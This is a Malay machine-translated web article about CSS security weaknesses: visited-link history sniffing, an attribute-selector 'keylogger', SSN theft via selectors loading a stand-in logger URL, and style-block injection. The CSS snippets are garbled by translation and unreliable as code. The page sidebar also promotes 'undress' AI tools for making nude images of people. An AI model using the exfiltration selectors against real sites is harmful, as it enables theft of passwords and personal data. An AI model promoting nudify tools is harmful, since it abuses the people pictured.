cari
Rumahhujung hadapan webtutorial cssKelemahan keselamatan CSS

Kelemahan keselamatan CSS

Jennifer Aniston
Jennifer Aniston
Apr 17, 2025 am 10:02 AM

Kelemahan keselamatan CSS

Jangan panik! CSS sendiri bukan risiko keselamatan utama, dan dalam kebanyakan kes tidak perlu terlalu risau.

Walau bagaimanapun, beberapa artikel akan membincangkan ciri -ciri CSS yang berpotensi mengejutkan dan juga membimbangkan. Mari kita meringkaskan:

Isu pautan yang telah dikunjungi

Masalahnya digambarkan seperti berikut:

  1. Terdapat pautan di laman web ke halaman tertentu, seperti Tickle Pigs .
  2. Anda menggunakan :visited untuk menetapkan warna pautan yang dikunjungi, seperti a:visited { color: pink; } , yang bukan gaya ejen pengguna lalai.
  3. Anda menguji gaya pengiraan pautan.
  4. Jika warna berwarna merah jambu, ini bermakna pengguna telah melawat halaman tersebut.
  5. Anda melaporkan maklumat ini kepada pelayan dan melakukan tindakan tertentu dengan sewajarnya (seperti meningkatkan kadar premium insurans).

Anda mungkin melakukan ini dengan CSS sepenuhnya, kerana gaya :visited mungkin mengandungi background-image: url(/data-logger/tickle.php); , yang hanya akan diminta oleh pengguna yang telah melawat halaman tersebut.

Jangan risau! Pelayar telah menyekat serangan ini.

Keylogger

Masalahnya digambarkan seperti berikut:

  1. Terdapat kotak input pada halaman, mungkin kotak input kata laluan.
  2. Anda mengambil skrip rekod sebagai imej latar belakang kotak input dan menambah sebilangan besar pemilih untuk mengumpul maklumat kata laluan.
 input [nilai^= "a"] {latar belakang: url (logger.php? v = a); }

Ini tidak mudah dicapai. Atribut value kotak input tidak akan berubah dengan segera kerana input pengguna. Tetapi dalam kerangka seperti React, ini kadang -kadang berlaku. Oleh itu, secara teori, keylogger CSS ini mungkin berfungsi jika anda menambah CSS ini ke halaman log masuk yang dibina dengan React.

Walau bagaimanapun, dalam kes ini, kod JavaScript telah dilaksanakan pada halaman. Untuk serangan sedemikian, JavaScript jauh lebih berbahaya daripada CSS. Keylogger JavaScript memantau peristiwa utama dan melaporkannya melalui Ajax dengan hanya beberapa baris kod.

Dasar Keselamatan Kandungan (CSP) boleh menyekat JavaScript dalam talian yang disuntik oleh pihak ketiga dan XSS ... dan tentu saja, ia juga boleh menyekat CSS.

Kecurian data

Masalahnya digambarkan seperti berikut:

  1. Sekiranya saya dapat menambah CSS yang berniat jahat ke halaman laman web yang anda log masuk ...
  2. Dan laman web memaparkan maklumat sensitif, seperti Nombor Keselamatan Sosial (SSN), pra-penuh dalam bentuk ...
  3. Saya boleh mendapatkannya dengan pemilih harta.
 input#ssn [value = "123-45-6789"] {latar belakang: url (https://secret-site.com/logger.php?ssn=123-45-6789); }

Dengan sebilangan besar pemilih, anda boleh menampung semua kemungkinan!

Masalah Blok Gaya Baris

Saya tidak pasti jika ini harus dipersalahkan di CSS, tetapi bayangkan:

 ... masukkan beberapa kandungan yang dihasilkan pengguna ...

Mungkin anda membenarkan pengguna menyesuaikan beberapa CSS. Ini adalah vektor serangan kerana mereka boleh menutup tag gaya, tag skrip terbuka, dan menulis kod JavaScript yang berniat jahat.

Pasti ada lagi

Adakah anda memikirkannya? Kongsi.

Saya ragu -ragu mengenai tahap ketakutan terhadap kelemahan keselamatan CSS. Saya tidak mahu mengatasi masalah keselamatan (terutamanya isu pihak ketiga) kerana saya bukan pakar dan keselamatan adalah penting. Tetapi pada masa yang sama, saya tidak pernah mendengar tentang CSS menjadi vektor serangan selain daripada eksperimen pemikiran. Tolong ajar saya!

Atas ialah kandungan terperinci Kelemahan keselamatan CSS. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Artikel Berkaitan
Haunted: cangkuk untuk komponen webHaunted: cangkuk untuk komponen webApr 19, 2025 am 11:06 AM

Saya hanya berbual dengan Dave dan dia memberitahu saya tentang berhantu. Ia cangkuk, tetapi untuk komponen web asli! Cukup sejuk. Saya rasa kewujudan barangan seperti ini

Berita Platform Mingguan: Masa Acara, Google Earth untuk Web, Undead Sesi CookiesBerita Platform Mingguan: Masa Acara, Google Earth untuk Web, Undead Sesi CookiesApr 19, 2025 am 10:57 AM

Dalam berita minggu ini, Wikipedia membantu mengenal pasti tiga pengendali klik perlahan, Google Earth datang ke web, sifat SVG dalam CSS mendapatkan lebih banyak sokongan, dan apa yang perlu dilakukan sekiranya berlaku kue zombie.

Pemotongan pelbagai baris dengan CSS tulenPemotongan pelbagai baris dengan CSS tulenApr 19, 2025 am 10:50 AM

Caranya dalam artikel ini masih cukup kemas dan pandai, tetapi ada cara yang kini standard untuk melakukan ini yang mungkin pertaruhan terbaik anda.

Perpustakaan animasi CSSPerpustakaan animasi CSSApr 19, 2025 am 10:46 AM

Terdapat banyak perpustakaan yang ingin membantu anda menghidupkan perkara di web. Ini tidak benar -benar perpustakaan yang membantu anda dengan sintaks atau

Input Warna: Menyelam dalam ke dalam perbezaan silang penyemak imbasInput Warna: Menyelam dalam ke dalam perbezaan silang penyemak imbasApr 19, 2025 am 10:40 AM

Dalam artikel ini, kita akan melihat struktur di dalam elemen, ketidakkonsistenan pelayar, mengapa mereka melihat cara tertentu dalam penyemak imbas tertentu, dan bagaimana

Menyekat elemen (pseudo) ke kotak sempadan ibu bapa 'Menyekat elemen (pseudo) ke kotak sempadan ibu bapa 'Apr 19, 2025 am 10:39 AM

Pernahkah anda mahu memastikan bahawa tiada elemen (pseudo) yang dipaparkan di luar kotak sempadan ibu bapa ' s? Sekiranya anda mempunyai masalah untuk membayangkan apa

Roti bakarRoti bakarApr 19, 2025 am 10:30 AM

Suatu hari, tiba -tiba, saya mula mendengar jenaka tentang roti bakar. Saya tidak tahu apa konteksnya. Saya menganggap beberapa rakan baru mula menceritakan jenaka roti bakar,

Melindungi laluan Vue dengan pengawal navigasiMelindungi laluan Vue dengan pengawal navigasiApr 19, 2025 am 10:29 AM

Pengesahan adalah bahagian yang diperlukan dari setiap aplikasi web. Ini adalah cara yang berguna di mana kita dapat memperibadikan pengalaman dan memuatkan kandungan khusus untuk a

See all articles

Alat AI Hot

Undresser.AI Undress

Undresser.AI Undress

Apl berkuasa AI untuk mencipta foto bogel yang realistik

AI Clothes Remover

AI Clothes Remover

Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.

Undress AI Tool

Undress AI Tool

Gambar buka pakaian secara percuma

Clothoff.io

Clothoff.io

Penyingkiran pakaian AI

AI Hentai Generator

AI Hentai Generator

Menjana ai hentai secara percuma.

Tunjukkan Lagi

Artikel Panas

Assassin's Creed Shadows: Penyelesaian Riddle Seashell
3 minggu yang laluByDDD
Apa yang Baru di Windows 11 KB5054979 & Cara Memperbaiki Masalah Kemas Kini
2 minggu yang laluByDDD
Di mana untuk mencari kad kunci kawalan kren di atomfall
3 minggu yang laluByDDD
Penjimatan di R.E.P.O. Dijelaskan (dan simpan fail)
1 bulan yang laluBy尊渡假赌尊渡假赌尊渡假赌
Assassin's Creed Shadows - Cara Mencari Orang Panda
4 minggu yang laluByDDD
Tunjukkan Lagi

Alat panas

Dreamweaver Mac版

Dreamweaver Mac版

Alat pembangunan web visual

Notepad++7.3.1

Notepad++7.3.1

Editor kod yang mudah digunakan dan percuma

mPDF

mPDF

mPDF ialah perpustakaan PHP yang boleh menjana fail PDF daripada HTML yang dikodkan UTF-8. Pengarang asal, Ian Back, menulis mPDF untuk mengeluarkan fail PDF "dengan cepat" dari tapak webnya dan mengendalikan bahasa yang berbeza. Ia lebih perlahan dan menghasilkan fail yang lebih besar apabila menggunakan fon Unicode daripada skrip asal seperti HTML2FPDF, tetapi menyokong gaya CSS dsb. dan mempunyai banyak peningkatan. Menyokong hampir semua bahasa, termasuk RTL (Arab dan Ibrani) dan CJK (Cina, Jepun dan Korea). Menyokong elemen peringkat blok bersarang (seperti P, DIV),

Pelayar Peperiksaan Selamat

Pelayar Peperiksaan Selamat

Pelayar Peperiksaan Selamat ialah persekitaran pelayar selamat untuk mengambil peperiksaan dalam talian dengan selamat. Perisian ini menukar mana-mana komputer menjadi stesen kerja yang selamat. Ia mengawal akses kepada mana-mana utiliti dan menghalang pelajar daripada menggunakan sumber yang tidak dibenarkan.

Penyesuai Pelayan SAP NetWeaver untuk Eclipse

Penyesuai Pelayan SAP NetWeaver untuk Eclipse

Integrasikan Eclipse dengan pelayan aplikasi SAP NetWeaver.

Tunjukkan Lagi

Topik panas

Di manakah pintu masuk log masuk untuk e-mel gmail?
7566
15
Tutorial CakePHP
1386
52
Apakah format nama akaun stim
87
11
kunci pengaktifan win11 kekal
61
19
Sambungan NYT menunjukkan dan jawapan
28
105
Tunjukkan Lagi